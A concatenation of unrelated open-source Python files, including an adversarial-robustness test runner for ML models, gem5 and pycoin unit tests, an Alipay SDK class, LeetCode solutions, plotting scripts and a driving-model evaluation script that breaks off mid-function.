if hex_uuids:
convert_uuids_to_hex(data)
print(json.dumps(data, sort_keys=True, indent=4), file=out)
else:
with open(target_path, "wb") as out:
out.write(contents)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("document", help="Apple Numbers file(s)", nargs="*")
parser.add_argument("-V", "--version", action="store_true")
parser.add_argument("--hex-uuids", action="store_true", help="print UUIDs as hex")
parser.add_argument("--output", "-o", help="directory name to unpack into")
args = parser.parse_args()
if args.version:
print(_get_version())
elif args.output is not None and len(args.document) > 1:
print(
"unpack-numbers: error: output directory only valid with a single document",
file=sys.stderr,
)
sys.exit(1)
elif len(args.document) == 0:
parser.print_help()
else:
for document in args.document:
output_dir = args.output or document.replace(".numbers", "")
try:
read_numbers_file(
document,
handler=lambda contents, filename: process_file(
contents, filename, output_dir, args.hex_uuids
),
store_objects=False,
)
except FileFormatError as e:
print(f"{document}:", str(e), file=sys.stderr)
sys.exit(1)
if __name__ == "__main__":
# execute only if run as a script
main()
|
examples/plugins/robustness/test_distance_attack.py | Harald-R/aw_nas | 195 | 12690963 | # pylint: disable-all
"""
Test a final model with distance attacks
"""
import os
import copy
import argparse
import subprocess
import yaml
if __name__ == "__main__":
TEST_TYPES = {
"BIM_L2": {
"adversary_type": "L2BasicIterativeAttack",
"distance_type": "MeanSquaredDistance",
},
"BIM_LINF": {
"adversary_type": "LinfinityBasicIterativeAttack",
"distance_type": "Linfinity",
},
"CW_L2": {
"adversary_type": "CarliniWagnerL2Attack",
"distance_type": "MeanSquaredDistance",
},
"DEEPFOOL_L2": {
"adversary_type": "DeepFoolL2Attack",
"distance_type": "MeanSquaredDistance",
},
"DEEPFOOL_LINF": {
"adversary_type": "DeepFoolLinfinityAttack",
"distance_type": "Linfinity",
},
}
parser = argparse.ArgumentParser()
parser.add_argument("cfg_file")
parser.add_argument("--load", default=None, help="load a checkpoint")
parser.add_argument(
"--load_state_dict", default=None, help="load checkpoint's state dict"
)
parser.add_argument(
"--type",
"-t",
required=True,
action="append",
default=[],
help="distance attack type",
choices=list(TEST_TYPES.keys()) + [t.lower() for t in TEST_TYPES.keys()],
)
parser.add_argument("--gpu", default=0, type=int)
args = parser.parse_args()
assert (
args.load is not None or args.load_state_dict is not None
), "Checkpoint Required."
with open(args.cfg_file, "r") as rf:
base_cfg = yaml.load(rf)
test_cfg_files = []
log_files = []
save_path = (
args.load if args.load is not None else os.path.dirname(args.load_state_dict)
)
for test_type in args.type:
cfg = copy.deepcopy(base_cfg)
cfg["objective_type"] = "adversarial_distance_objective"
cfg["objective_cfg"] = {}
cfg["objective_cfg"]["mean"] = base_cfg["objective_cfg"]["mean"]
cfg["objective_cfg"]["std"] = base_cfg["objective_cfg"]["std"]
cfg["objective_cfg"]["num_classes"] = base_cfg["objective_cfg"].get(
"num_classes", base_cfg["final_model_cfg"].get("num_classes", 10)
)
cfg["objective_cfg"].update(TEST_TYPES[test_type.upper()])
test_cfg_files.append(
"{}-test-{}.yaml".format(
os.path.splitext(args.cfg_file)[0], test_type.upper()
)
)
log_files.append(
os.path.join(save_path, "test-{}.log".format(test_type.upper()))
)
with open(test_cfg_files[-1], "w") as wf:
yaml.dump(cfg, wf)
for test_type, test_cfg_file, log_file in zip(args.type, test_cfg_files, log_files):
print(
"****Test {}. Test cfg: {}. Log saved to {}.****".format(
test_type, test_cfg_file, log_file
)
)
if args.load_state_dict is not None:
subprocess.check_call(
"awnas test {} --load-state-dict {} --gpus {} -s test 2>&1 | tee {}".format(
test_cfg_file, args.load_state_dict, args.gpu, log_file
),
shell=True,
)
elif args.load is not None:
subprocess.check_call(
"awnas test {} --load {} --gpus {} -s test 2>&1 | tee {}".format(
test_cfg_file, args.load, args.gpu, log_file
),
shell=True,
)
|
tests/gem5/memory/test.py | hyu-iot/gem5 | 765 | 12690971 |
# Copyright (c) 2018 The Regents of the University of California.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Test file for simple memory test
TODO: Add stats checking
'''
from testlib import *
gem5_verify_config(
name='simple_mem_default',
    verifiers=(), # No need for verifiers; this will return non-zero on fail
config=joinpath(getcwd(), 'simple-run.py'),
config_args = [],
valid_isas=(constants.null_tag,),
)
simple_mem_params = [
('inf-bandwidth', {'bandwidth': '0GB/s'}),
('low-latency', {'latency': '1ns'}),
('high-latency', {'latency': '1us'}),
('low-bandwidth', {'bandwidth': '1MB/s'}),
('high-var', {'latency_var': '100ns'})
]
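
# Editorial note (added): each (name, params) pair above is expanded below into
# '--key=value' command-line flags, e.g. ('low-latency', {'latency': '1ns'}) becomes
# ['--latency=1ns'] and is passed as config_args to simple-run.py.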
for name, params in simple_mem_params:
args = ['--' + key + '=' + val for key,val in params.items()]
gem5_verify_config(
name='simple_mem_' + name,
        verifiers=(), # No need for verifiers; this will return non-zero on fail
config=joinpath(getcwd(), 'simple-run.py'),
config_args = args,
valid_isas=(constants.null_tag,),
) # This tests for validity as well as performance
gem5_verify_config(
name='memtest',
    verifiers=(), # No need for verifiers; this will return non-zero on fail
config=joinpath(getcwd(), 'memtest-run.py'),
config_args = [],
valid_isas=(constants.null_tag,),
)
null_tests = [
('garnet_synth_traffic', ['--sim-cycles', '5000000']),
('memcheck', ['--maxtick', '2000000000', '--prefetchers']),
('ruby_mem_test', ['--abs-max-tick', '20000000',
'--functional', '10']),
('ruby_random_test', ['--maxloads', '5000']),
('ruby_direct_test', ['--requests', '50000']),
]
for basename_noext, args in null_tests:
gem5_verify_config(
name=basename_noext,
fixtures=(),
verifiers=(),
config=joinpath(config.base_dir, 'configs',
'example', basename_noext + '.py'),
config_args=args,
valid_isas=(constants.null_tag,),
valid_hosts=constants.supported_hosts,
)
|
tests/sighash_single_test.py | jaschadub/pycoin | 1,210 | 12690979 |
import unittest
from pycoin.ecdsa.secp256k1 import secp256k1_generator
from pycoin.encoding.hexbytes import b2h, b2h_rev
from pycoin.intbytes import int2byte
from pycoin.networks.registry import network_for_netcode
from pycoin.satoshi.der import sigdecode_der, sigencode_der
PRIV_KEYS = (
2330949616242593315303241053456316633827293588958882755297900732239663851861,
4437411780076344925846479906614060621668407514498402815534040340772719979673,
14311886404724799688521454580288220586308410691395501373612453626821267193196,
16404731722033649474165521611800542240555275746052963990137782680023514762282,
92715304942310420502826004911529506622922082818576946681102234225452853924813,
103235678552410630318322729483874198805317322052500844759252733409163632402845,
)
def sigcheck(a_key, a_hash_for_sig, a_sig):
"""
Returns True if a_key was used to generate a_sig from a_hash_for_sig;
False otherwise.
"""
r, s = sigdecode_der(a_sig)
return secp256k1_generator.verify(a_key.public_pair(), a_hash_for_sig, (r, s))
def sigmake(a_key, a_hash_for_sig, a_sig_type):
"""
Signs a_hash_for_sig with a_key and returns a DER-encoded signature
with a_sig_type appended.
"""
order = secp256k1_generator.order()
r, s = secp256k1_generator.sign(a_key.secret_exponent(), a_hash_for_sig)
if s + s > order:
s = order - s
return sigencode_der(r, s) + int2byte(a_sig_type)
class SighashSingleTest(unittest.TestCase):
def test_sighash_single(self):
for netcode in ["BTC", "XTN"]:
self._test_sighash_single(network_for_netcode(netcode))
def _test_sighash_single(self, network):
flags = network.validator.flags
k0, k1, k2, k3, k4, k5 = [
network.keys.private(secret_exponent=se, is_compressed=True) for se in PRIV_KEYS]
# Fake a coinbase transaction
coinbase_tx = network.tx.coinbase_tx(k0.sec(), 500000000)
for k in [k1, k2]:
coinbase_tx.txs_out.append(network.tx.TxOut(
1000000000, network.script.compile('%s OP_CHECKSIG' % b2h(k.sec()))))
self.assertEqual('2acbe1006f7168bad538b477f7844e53de3a31ffddfcfc4c6625276dd714155a',
b2h_rev(coinbase_tx.hash()))
# Make the test transaction
txs_in = [
network.tx.TxIn(coinbase_tx.hash(), 0),
network.tx.TxIn(coinbase_tx.hash(), 1),
network.tx.TxIn(coinbase_tx.hash(), 2),
]
txs_out = [
network.tx.TxOut(900000000, network.contract.for_address(k3.address())),
network.tx.TxOut(800000000, network.contract.for_address(k4.address())),
network.tx.TxOut(800000000, network.contract.for_address(k5.address())),
]
tx = network.tx(1, txs_in, txs_out)
tx.set_unspents(coinbase_tx.txs_out)
self.assertEqual('791b98ef0a3ac87584fe273bc65abd89821569fd7c83538ac0625a8ca85ba587', b2h_rev(tx.hash()))
sig_type = flags.SIGHASH_SINGLE
solution_checker = network.tx.SolutionChecker(tx)
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[0].script, 0, sig_type)
self.assertEqual(0xcc52d785a3b4133504d1af9e60cd71ca422609cb41df3a08bbb466b2a98a885e, sig_hash)
sig = sigmake(k0, sig_hash, sig_type)
self.assertTrue(sigcheck(k0, sig_hash, sig[:-1]))
tx.txs_in[0].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(0))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[1].script, 1, sig_type)
self.assertEqual(0x93bb883d70fccfba9b8aa2028567aca8357937c65af7f6f5ccc6993fd7735fb7, sig_hash)
sig = sigmake(k1, sig_hash, sig_type)
self.assertTrue(sigcheck(k1, sig_hash, sig[:-1]))
tx.txs_in[1].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(1))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[2].script, 2, sig_type)
self.assertEqual(0x53ef7f67c3541bffcf4e0d06c003c6014e2aa1fb38ff33240b3e1c1f3f8e2a35, sig_hash)
sig = sigmake(k2, sig_hash, sig_type)
self.assertTrue(sigcheck(k2, sig_hash, sig[:-1]))
tx.txs_in[2].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(2))
sig_type = flags.SIGHASH_SINGLE | flags.SIGHASH_ANYONECANPAY
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[0].script, 0, sig_type)
self.assertEqual(0x2003393d246a7f136692ce7ab819c6eadc54ffea38eb4377ac75d7d461144e75, sig_hash)
sig = sigmake(k0, sig_hash, sig_type)
self.assertTrue(sigcheck(k0, sig_hash, sig[:-1]))
tx.txs_in[0].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(0))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[1].script, 1, sig_type)
self.assertEqual(0xe3f469ac88e9f35e8eff0bd8ad4ad3bf899c80eb7645947d60860de4a08a35df, sig_hash)
sig = sigmake(k1, sig_hash, sig_type)
self.assertTrue(sigcheck(k1, sig_hash, sig[:-1]))
tx.txs_in[1].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(1))
sig_hash = solution_checker._signature_hash(coinbase_tx.txs_out[2].script, 2, sig_type)
self.assertEqual(0xbacd7c3ab79cad71807312677c1788ad9565bf3c00ab9a153d206494fb8b7e6a, sig_hash)
sig = sigmake(k2, sig_hash, sig_type)
self.assertTrue(sigcheck(k2, sig_hash, sig[:-1]))
tx.txs_in[2].script = network.script.compile(b2h(sig))
self.assertTrue(tx.is_solution_ok(2))
if __name__ == "__main__":
unittest.main()
|
alipay/aop/api/domain/InsOffilneProduct.py | snowxmas/alipay-sdk-python-all | 213 | 12690996 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class InsOffilneProduct(object):
def __init__(self):
self._biz_data = None
self._prod_code = None
self._prod_name = None
@property
def biz_data(self):
return self._biz_data
@biz_data.setter
def biz_data(self, value):
self._biz_data = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def prod_name(self):
return self._prod_name
@prod_name.setter
def prod_name(self, value):
self._prod_name = value
def to_alipay_dict(self):
params = dict()
if self.biz_data:
if hasattr(self.biz_data, 'to_alipay_dict'):
params['biz_data'] = self.biz_data.to_alipay_dict()
else:
params['biz_data'] = self.biz_data
if self.prod_code:
if hasattr(self.prod_code, 'to_alipay_dict'):
params['prod_code'] = self.prod_code.to_alipay_dict()
else:
params['prod_code'] = self.prod_code
if self.prod_name:
if hasattr(self.prod_name, 'to_alipay_dict'):
params['prod_name'] = self.prod_name.to_alipay_dict()
else:
params['prod_name'] = self.prod_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = InsOffilneProduct()
if 'biz_data' in d:
o.biz_data = d['biz_data']
if 'prod_code' in d:
o.prod_code = d['prod_code']
if 'prod_name' in d:
o.prod_name = d['prod_name']
return o
|
Codes/gracekoo/85_maximal-rectangle.py | liuxiaohui1221/algorithm | 256 | 12691020 |
# -*- coding: utf-8 -*-
# @Time: 2020/3/30 22:22
# @Author: GraceKoo
# @File: 85_maximal-rectangle.py
# @Desc:https://leetcode-cn.com/problems/maximal-rectangle/
from typing import List
class Solution:
def maximalRectangle(self, matrix: List[List[str]]) -> int:
max_area = 0
dp = [0] * len(matrix[0])
for row in range(0, len(matrix)):
for col in range(0, len(matrix[0])):
dp[col] = dp[col] + 1 if matrix[row][col] == "1" else 0
max_area = max(max_area, self.largestRectangleArea(dp))
return max_area
# from 84_largest-rectangle-in-histogram
def largestRectangleArea(self, heights: List[int]) -> int:
stack = []
res = 0
heights = [0] + heights + [0]
for i in range(len(heights)):
while stack and heights[i] < heights[stack[-1]]:
tmp = stack.pop()
res = max(res, (i - stack[-1] - 1) * heights[tmp])
stack.append(i)
return res
so = Solution()
print(
so.maximalRectangle(
[
["1", "0", "1", "0", "0"],
["1", "0", "1", "1", "1"],
["1", "1", "1", "1", "1"],
["1", "0", "0", "1", "0"],
]
)
)
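
# Editorial note (added): for this classic example the expected output is 6, i.e. the
# 2 x 3 block of ones covering rows 1-2, columns 2-4 of the matrix above.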
|
RecoParticleFlow/PFProducer/python/pfConcretePFCandidateProducer_cfi.py | ckamtsikis/cmssw | 852 | 12691075 | import FWCore.ParameterSet.Config as cms
pfConcretePFCandidateProducer = cms.EDProducer("PFConcretePFCandidateProducer",
src = cms.InputTag('particleFlow')
)
|
Python3/795.py | rakhi2001/ecom7 | 854 | 12691079 |
__________________________________________________________________________________________________
sample 372 ms submission
# look at every subarray individually and compare elements to L and R -> O(n^3)
# use stack
# iterate through A
# keep track of max of the current stack
# if max <
# if you find an element that is between L and R, then all subarrays consisting of that element and elements to the left and right of it
# which are less than R will be valid subarrays
class Solution:
def numSubarrayBoundedMax(self, A: List[int], L: int, R: int) -> int:
res, dp = 0, 0
prev = -1
for i,a in enumerate(A):
if a < L:
res += dp
elif a > R:
dp = 0
prev = i
else:
dp = i - prev
res += dp
return res
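
# Editorial worked example (added, not part of the submission): for A = [2, 1, 4, 3],
# L = 2, R = 3 the qualifying subarrays are [2], [2, 1] and [3], so the method returns 3.
# Each element inside [L, R] contributes (i - prev) new subarrays, and each element
# below L re-adds the last such count.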
__________________________________________________________________________________________________
sample 14136 kb submission
class Solution:
def numSubarrayBoundedMax(self, A: List[int], L: int, R: int) -> int:
prev = -1
res = 0
last = 0
for i, n in enumerate(A):
if L<=n<=R:
last = i-prev
res += last
elif n<=L:
res += last
else:
prev = i
last = 0
return res
__________________________________________________________________________________________________
|
HRI/TFVT_HRI/scripts/plot_valence_arousal_plain.py | WorldEditors/PaddleRobotics | 146 | 12691096 | import os
import codecs
import numpy as np
import matplotlib.pyplot as plt
Has_Header = True
CSV = 'data/valence_arousal_exp.csv'
def calculate_mean_variance(data):
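    # Editorial note (assumption): this appears to implement circular statistics on the
    # rated (valence, arousal) points: each sample is reduced to an angle theta, R is the
    # mean resultant length of the unit vectors, and sigma = sqrt(-2 * ln(R)) is the
    # circular standard deviation drawn as the shaded sector in the plot below.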
theta = np.arctan(data[:, 0] / data[:, 1])
m_x = np.mean(np.cos(theta))
m_y = np.mean(np.sin(theta))
mu = np.arctan(m_y / m_x)
R = np.sqrt(m_x ** 2 + m_y ** 2)
sigma = np.sqrt(-2 * np.log(R))
return mu, sigma
def filled_arc(center, radius, theta1, theta2, color):
# Ref: https://stackoverflow.com/a/30642704
phi = np.linspace(theta1, theta2, 100)
x = center[0] + radius * np.cos(phi)
y = center[1] + radius * np.sin(phi)
# Equation of the chord
m = (y[-1] - y[0]) / (x[-1] - x[0])
c = y[0] - m * x[0]
y2 = m * x + c
# Plot the filled arc
plt.fill_between(x, y, y2, facecolor=color, edgecolor='none', alpha=0.5)
def filled_sector(center, radius, theta1, theta2, color):
filled_arc(center, radius, theta1, theta2, color)
# Fill triangle
x_0, y_0 = center
x_1 = center[0] + radius * np.cos(theta1)
y_1 = center[1] + radius * np.sin(theta1)
x_2 = center[0] + radius * np.cos(theta2)
y_2 = center[1] + radius * np.sin(theta2)
plt.fill([x_0, x_1, x_2, x_0], [y_0, y_1, y_2, y_0], facecolor=color,
edgecolor='none', alpha=0.5)
def plot(name_lst, group_lst, mu_lst, sigma_lst):
cx, cy = 5.0, 5.0
colors = ['red', 'blue']
markers = ['x', '+']
linestyles = ['r-', 'b--']
bg_img = plt.imread('data/28-affect-words.png')
# plt.imshow(bg_img, extent=[-0.5, 10.5, -0.5, 10.5])
plt.imshow(bg_img, extent=[-0.2, 10.2, 0.1, 9.9])
theta = np.linspace(0, 2 * np.pi, 100)
radius = 4.8
x = radius * np.cos(theta) + cx
y = radius * np.sin(theta) + cy
plt.plot(x, y, color='black')
for name, group, mu, sigma, color, marker, linestyle in \
zip(name_lst, group_lst, mu_lst, sigma_lst, colors, markers, linestyles):
plt.plot(group[:, 0], group[:, 1], marker, label=name, color=color)
ex = cx + radius * np.cos(mu)
ey = cy + radius * np.sin(mu)
plt.plot([cx, ex], [cy, ey], linestyle)
for d_mu in [-sigma, sigma]:
ex = cx + radius * np.cos(mu + d_mu)
ey = cy + radius * np.sin(mu + d_mu)
plt.plot([cx, ex], [cy, ey], linestyle='-', color='black')
filled_sector([cx, cy], radius, mu - sigma, mu + sigma, color)
plt.axis('equal')
plt.xlabel('Valence')
plt.ylabel('Arousal')
plt.xlim(0, 10)
plt.ylim(0, 10)
plt.legend(loc='lower left', bbox_to_anchor=(0.65, 0.0))
plt.savefig('valence_arousal_plain.pdf', bbox_inches='tight')
plt.show()
group_1, group_2 = [], []
with codecs.open(CSV, 'r', 'utf-8') as f:
for line in f.readlines():
if Has_Header:
Has_Header = False
continue
eps = np.random.random(2) * 0.1
data = line.strip().split(',')
if int(data[0]) == 1:
group_1.append((int(data[2]) + eps[0], int(data[3]) + eps[1]))
elif int(data[0]) == 2:
group_2.append((int(data[2]) + eps[0], int(data[3]) + eps[1]))
group_1 = np.array(group_1)
group_2 = np.array(group_2)
mu_1, sigma_1 = calculate_mean_variance(group_1)
mu_2, sigma_2 = calculate_mean_variance(group_2)
plot(['Reactive HRI', 'TFVT-HRI'], [group_2, group_1], [mu_2, mu_1], [sigma_2, sigma_1])
|
ddpg/results/plot_reward.py | q110110543/deep-rl | 113 | 12691097 | import numpy
import matplotlib.pyplot as plt
FILE_NAME = 'rewards_nonshare.npz'
def smooth(reward_vec, filter_size):
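    # Editorial note (added): sliding-window moving average; element i of the result is
    # the mean of reward_vec[i:i + filter_size], so the output is filter_size - 1 samples
    # shorter than the input.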
l = len(reward_vec) - filter_size + 1
print(len(reward_vec))
smooth_reward_vec = numpy.zeros(l)
for i in range(l):
reward = numpy.mean(reward_vec[i:i+filter_size])
smooth_reward_vec[i] = reward
return smooth_reward_vec
if __name__ == '__main__':
f = numpy.load(FILE_NAME)
reward = f['arr_0']
qmax = f['arr_1']
reward_smooth = smooth(reward, 300)
l = len(reward_smooth)
fig = plt.figure(figsize=(8,6))
line1, = plt.plot(reward_smooth, color='r', linestyle='-', linewidth=3)
line2, = plt.plot(numpy.arange(l), -150 * numpy.ones(l), color='k', linestyle=':', linewidth=1)
plt.xlabel('Episode', fontsize=26)
plt.ylabel('Reward', fontsize=24)
plt.xticks(fontsize=22)
plt.yticks([-800, -700, -600, -500, -400, -300, -200, -150, -100, 0], fontsize=22)
plt.axis([-20, l+10, -600, -100])
plt.tight_layout()
fig.savefig('reward.pdf', format='pdf', dpi=1200)
plt.show()
|
Basic/Calculate Factorial of A Number/SolutionByVaishnavi.py | rajethanm4/Programmers-Community | 261 | 12691121 | #To find factorial of number
num = int(input('N='))
factorial = 1
if num<0:
print('Number is not accepted')
elif num==0:
print(1)
else:
for i in range(1,num+1):
factorial = factorial * i
print(factorial)
|
neat/eval.py | sisl/neat | 183 | 12691171 | import argparse
import json
import os
import sys
from tqdm import tqdm
from PIL import Image, ImageDraw
import numpy as np
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.nn.functional as F
torch.backends.cudnn.benchmark = True
from config import GlobalConfig
from architectures import AttentionField
from data import CARLA_points
from utils import iou, flow_to_color
parser = argparse.ArgumentParser()
parser.add_argument('--id', type=str, help='Unique experiment identifier.')
parser.add_argument('--device', type=str, default='cuda', help='Device to use')
parser.add_argument('--vis', action='store_true', help='Visualize each model while evaluating')
parser.add_argument('--vis_freq', type=int, default=100, help='Visualization frequency')
parser.add_argument('--batch_size', type=int, default=16, help='Batch size')
parser.add_argument('--out_res', type=int, default=256, help='output image resolution')
args = parser.parse_args()
# config
conf = GlobalConfig()
# data
val_set = CARLA_points(conf.val_data, conf)
dataloader_val = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=8, pin_memory=True)
# model
model = AttentionField(conf, args.device)
# load saved weights
model.encoder.load_state_dict(torch.load('log/{}/best_encoder.pth'.format(args.id)))
model.decoder.load_state_dict(torch.load('log/{}/best_decoder.pth'.format(args.id)))
# image storage directories
if args.vis:
if not os.path.isdir(f"log/{args.id}/img"):
os.makedirs(f"log/{args.id}/img")
if not os.path.isdir(f"log/{args.id}/sem"):
os.makedirs(f"log/{args.id}/sem")
if not os.path.isdir(f"log/{args.id}/out"):
os.makedirs(f"log/{args.id}/out")
if not os.path.isdir(f"log/{args.id}/flow"):
os.makedirs(f"log/{args.id}/flow")
intersection_epoch = [0.] * conf.num_class
union_epoch = [0.] * conf.num_class
off_epoch = 0.
wp_epoch = 0.
match = 0
miss = 0
fp = 0
converter = np.uint8(conf.converter) # used for semantics
with torch.no_grad():
model.eval()
for batch_num, data in enumerate(tqdm(dataloader_val), 0):
# create batch and move to GPU
fronts_in = data['fronts']
lefts_in = data['lefts']
rights_in = data['rights']
images = []
for i in range(conf.seq_len):
images.append(fronts_in[i].to(args.device, dtype=torch.float32))
if conf.num_camera==3:
images.append(lefts_in[i].to(args.device, dtype=torch.float32))
images.append(rights_in[i].to(args.device, dtype=torch.float32))
# semantic points for network input
query_points = data['semantic_points'].to(args.device, dtype=torch.float32)
gt_occ = data['semantic_labels'].to(args.device)
# target points for network input
target_point = torch.stack(data['target_point']).to(args.device, dtype=torch.float32)
# waypoints for visualization
waypoints = []
# create driving offset label by looping over timesteps
# label = -query + waypoint so that at test time query + label = waypoint
gt_offsets = -query_points.clone()
for i in range(conf.tot_len):
waypoint = torch.stack(data['waypoints'][i]).to(args.device, dtype=torch.float32)
waypoints.append(waypoint)
# create a delta tensor to add to the query points
delta = waypoint.transpose(0,1).unsqueeze(1) # (B, 1, 2)
# divide to account for higher resolution
delta = (-gt_offsets[:,:,2]==i).unsqueeze(-1) * delta / conf.resolution # (B, P, 2)
gt_offsets[:,:,:2] += delta
gt_offsets = gt_offsets[:,:,:2].transpose(1,2) # (B, 2, P)
gt_offsets[:,1,:] += conf.offset # reconstruct only front of vehicle
velocity = data['velocity'].to(args.device, dtype=torch.float32)
# inference
encoding = model.encoder(images, velocity)
pred_occ, pred_off, _ = model.decode(query_points, target_point, encoding)
# waypoint prediction
pred_waypoint_mean, red_light_occ = model.plan(target_point, encoding, conf.plan_scale, conf.plan_points, conf.plan_iters)
wp_pred = pred_waypoint_mean[:,conf.seq_len:]
wp_gt = torch.stack(waypoints[conf.seq_len:], dim=1).transpose(0,2)
# s,t,b = model.control_pid(wp_pred, velocity, target_point, red_light_occ)
# grid used for visualizing occupancy and flow
linspace_x = torch.linspace(-conf.axis/2, conf.axis/2, steps=args.out_res)
linspace_y = torch.linspace(-conf.axis/2, conf.axis/2, steps=args.out_res)
linspace_t = torch.linspace(0, conf.tot_len - 1, steps=conf.tot_len)
# gt semantics
semantics = (data['topdowns'][0][0][0].data.cpu().numpy()).astype(np.uint8)
semantics = converter[semantics][:conf.axis,conf.offset:conf.axis+conf.offset]
red_light_gt = (semantics==3).sum()
if red_light_gt and red_light_occ:
match += 1
if red_light_gt and red_light_occ==0:
miss += 1
if red_light_gt==0 and red_light_occ:
fp += 1
if args.vis and (batch_num % args.vis_freq == 0):
for i in range(conf.seq_len):
# save one sample per batch
if not os.path.isdir(f"log/{args.id}/img/{str(i)}"):
os.makedirs(f"log/{args.id}/img/{str(i)}")
front_numpy = (fronts_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
left_numpy = (lefts_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
right_numpy = (rights_in[i][0].data.cpu().numpy().transpose((1, 2, 0))).astype(np.uint8)
image_numpy = np.concatenate([left_numpy,front_numpy,right_numpy], axis=1)
image_display = Image.fromarray(image_numpy)
image_display.save(f"log/{args.id}/img/{str(i)}/{str(batch_num).zfill(4)}.png")
# target point in pixel coordinates
target_point_pixel = target_point.squeeze().cpu().numpy()
target_point_pixel[1] += conf.offset * conf.resolution
# hack for when actual target is outside image (axis/2 * resolution)
target_point_pixel = np.clip(target_point_pixel, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
target_point_pixel = (target_point_pixel*args.out_res//50 + args.out_res//2).astype(np.uint8)
for i in range(conf.tot_len):
if not os.path.isdir(f"log/{args.id}/sem/{str(i)}"):
os.makedirs(f"log/{args.id}/sem/{str(i)}")
if not os.path.isdir(f"log/{args.id}/out/{str(i)}"):
os.makedirs(f"log/{args.id}/out/{str(i)}")
if not os.path.isdir(f"log/{args.id}/flow/{str(i)}"):
os.makedirs(f"log/{args.id}/flow/{str(i)}")
# gt semantics
semantics = (data['topdowns'][i][0][0].data.cpu().numpy()).astype(np.uint8)
semantics = converter[semantics][:conf.axis,conf.offset:conf.axis+conf.offset]
semantic_display = np.zeros((semantics.shape[0], semantics.shape[1], 3))
for key, value in conf.classes.items():
semantic_display[np.where(semantics == key)] = value
semantic_display = semantic_display.astype(np.uint8)
semantic_display = Image.fromarray(semantic_display)
semantic_display.save(f"log/{args.id}/sem/{str(i)}/{str(batch_num).zfill(4)}.png")
# gt waypoint in pixel coordinates
img_waypoint = waypoints[i].data.cpu().numpy()
img_waypoint[1] += conf.offset * conf.resolution
img_waypoint = np.clip(img_waypoint, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
img_waypoint = (img_waypoint*args.out_res//(conf.axis * conf.resolution) + args.out_res//2).astype(np.uint8)
# predicted waypoint in pixel coordinates
pred_waypoint = pred_waypoint_mean[0,i].data.cpu().numpy()
pred_waypoint[1] += conf.offset * conf.resolution
pred_waypoint = np.clip(pred_waypoint, -(conf.axis/2 * conf.resolution - 1), (conf.axis/2 * conf.resolution - 1))
pred_waypoint = (pred_waypoint*args.out_res//(conf.axis * conf.resolution) + args.out_res//2).astype(np.uint8)
# visualization of occupancy and flow
img_rows = []
flow_rows = []
for row in range(args.out_res):
grid_x, grid_y, grid_t = torch.meshgrid(linspace_x, linspace_y[row], linspace_t[i].unsqueeze(0))
grid_points = torch.stack((grid_x, grid_y, grid_t), dim=3).unsqueeze(0).repeat(args.batch_size,1,1,1,1)
grid_points = grid_points.reshape(args.batch_size,-1,3).to(args.device, dtype=torch.float32)
pred_img_pts, pred_img_offsets, _ = model.decode(grid_points, target_point, encoding)
pred_img_pts = torch.argmax(pred_img_pts[-1], dim=1)
pred_img = pred_img_pts.reshape(args.batch_size,args.out_res)
pred_flow = pred_img_offsets[-1].reshape(args.batch_size,2,args.out_res)
img_rows.append(pred_img)
flow_rows.append(pred_flow)
pred_img = torch.stack(img_rows, dim=-1)
pred_flow = torch.stack(flow_rows, dim=-1)
semantics = pred_img[0,:,:].transpose(1, 0).data.cpu().numpy().astype(np.uint8)
semantic_display = np.zeros((semantics.shape[0], semantics.shape[1], 3))
for key, value in conf.classes.items():
semantic_display[np.where(semantics == key)] = value
semantic_display = semantic_display.astype(np.uint8)
semantic_display = Image.fromarray(semantic_display)
semantic_display.save(f"log/{args.id}/out/{str(i)}/{str(batch_num).zfill(4)}.png")
# flow image of predicted offsets
flow_uv = pred_flow[0,:,:,:].transpose(2,0).data.cpu().numpy()*args.out_res/conf.axis
flow_rgb = flow_to_color(flow_uv)
